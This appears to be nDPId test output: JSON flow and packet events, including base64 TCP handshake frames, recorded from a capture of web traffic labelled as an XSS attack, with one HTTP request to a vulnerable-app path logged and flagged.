-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":2,"flow_last_seen":1499347476667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347476667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4QTgdpFp2AgxWaAScSB6wwAAAgQFtAQCCAoD5KpwATrY+gEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":3,"flow_last_seen":1499347476667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347476667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06aNAAD4G3DSsEAABwKgKMuEEAFDYCDFZ4HaRaoAQAOUZywAAAQEICgE62PoD5Kpw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347479172,"flow_last_seen":1499347479172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347479172,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1499347479172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347479172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iKNAAD4GPS2sEAABwKgKMuEeAFCusFPOAAAAAKACchCebgAAAgQFtAQCCAoBOtttAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":2,"flow_last_seen":1499347479172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347479172,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4R7s2gFNrrBTz6AScSAAXwAAAgQFtAQCCAoD5KziATrbbQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":3,"flow_last_seen":1499347479173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347479173,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iKRAAD4GPTSsEAABwKgKMuEeAFCusFPP7NoBToAQAOWfZgAAAQEICgE6220D5Kzi"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347480438,"flow_last_seen":1499347480438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347480438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1499347480438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347480438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UJlAAD4GdTesEAABwKgKMuEsAFBzZ4wwAAAAAKACchCgCwAAAgQFtAQCCAoBOtypAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":2,"flow_last_seen":1499347480438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347480438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4SwTIR0Qc2eMMaAScSC+tQAAAgQFtAQCCAoD5K4fATrcqQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":3,"flow_last_seen":1499347480439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347480439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UJpAAD4GdT6sEAABwKgKMuEsAFBzZ4wxEyEdEYAQAOVdvQAAAQEICgE63KkD5K4f"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347481724,"flow_last_seen":1499347481724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347481724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1499347481724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347481724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8fSpAAD4GSKasEAABwKgKMuE6AFDTgqDBAAAAAKACchAqDwAAAgQFtAQCCAoBOt3rAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":2,"flow_last_seen":1499347481724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347481724,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4TowvlKP04KgwqAScSD0WwAAAgQFtAQCCAoD5K9gATrd6wEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":3,"flow_last_seen":1499347481725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347481725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0fStAAD4GSK2sEAABwKgKMuE6AFDTgqDCML5SkIAQAOWTYwAAAQEICgE63esD5K9g"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347484263,"flow_last_seen":1499347484263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347484263,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1499347484263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347484263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UOVAAD4GdOusEAABwKgKMuFUAFABZrCAAAAAAKACchDp2AAAAgQFtAQCCAoBOuBlAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":2,"flow_last_seen":1499347484263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347484263,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4VQEZrkRAWawgaAScSB3gAAAAgQFtAQCCAoD5LHbATrgZQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4310,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":3,"flow_last_seen":1499347484264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347484264,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UOZAAD4GdPKsEAABwKgKMuFUAFABZrCBBGa5EoAQAOUWhwAAAQEICgE64GYD5LHb"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347485533,"flow_last_seen":1499347485533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485533,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1499347485533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jaZAAD4GOCqsEAABwKgKMuFiAFALNGwFAAAAAKACchAjOgAAAgQFtAQCCAoBOuGjAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":2,"flow_last_seen":1499347485533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4WJ5n4cfCzRsBqAScSBsXQAAAgQFtAQCCAoD5LMYATrhowEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4322,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":3,"flow_last_seen":1499347485534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347485534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jadAAD4GODGsEAABwKgKMuFiAFALNGwGeZ+HIIAQAOULZQAAAQEICgE64aMD5LMY"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347356478,"flow_last_seen":1499347361716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347356478,"flow_last_seen":1499347361716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347357727,"flow_last_seen":1499347363716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347357727,"flow_last_seen":1499347363716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347360285,"flow_last_seen":1499347365717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347360285,"flow_last_seen":1499347365717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347361540,"flow_last_seen":1499347366717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347361540,"flow_last_seen":1499347366717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347364056,"flow_last_seen":1499347369718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347364056,"flow_last_seen":1499347369718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347486787,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347486787,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D7tAAD4GthWsEAABwKgKMuFwAFB2mu1nAAAAAKACchA1KgAAAgQFtAQCCAoBOuLcAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":2,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4XA0h5CedprtaKAScSC4rAAAAgQFtAQCCAoD5LRSATri3AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":3,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D7xAAD4GthysEAABwKgKMuFwAFB2mu1oNIeQn4AQAOVXtAAAAQEICgE64twD5LRS"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4344,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347484263,"flow_last_seen":1499347487799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347487799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347489408,"flow_last_seen":1499347489408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347489408,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1499347489408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86N5AAD4G3PGsEAABwKgKMuGKAFByXg2yAAAAAKACchAWcgAAAgQFtAQCCAoBOuVsAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":2,"flow_last_seen":1499347489408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4YpoWWpFcl4Ns6AScSCJ7AAAAgQFtAQCCAoD5LbhATrlbAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4356,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":3,"flow_last_seen":1499347489409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347489409,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06N9AAD4G3PisEAABwKgKMuGKAFByXg2zaFlqRoAQAOUo9AAAAQEICgE65WwD5Lbh"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347490659,"flow_last_seen":1499347490659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347490659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1499347490659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347490659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8roVAAD4GF0usEAABwKgKMuGYAFBT40ghAAAAAKACchD5NwAAAgQFtAQCCAoBOuakAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4364,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":2,"flow_last_seen":1499347490659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347490659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4ZjtXjkmU+NIIqAScSAXkwAAAgQFtAQCCAoD5LgaATrmpAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":3,"flow_last_seen":1499347490660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347490660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0roZAAD4GF1KsEAABwKgKMuGYAFBT40gi7V45J4AQAOW2mQAAAQEICgE65qUD5Lga"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347493167,"flow_last_seen":1499347493167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347493167,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
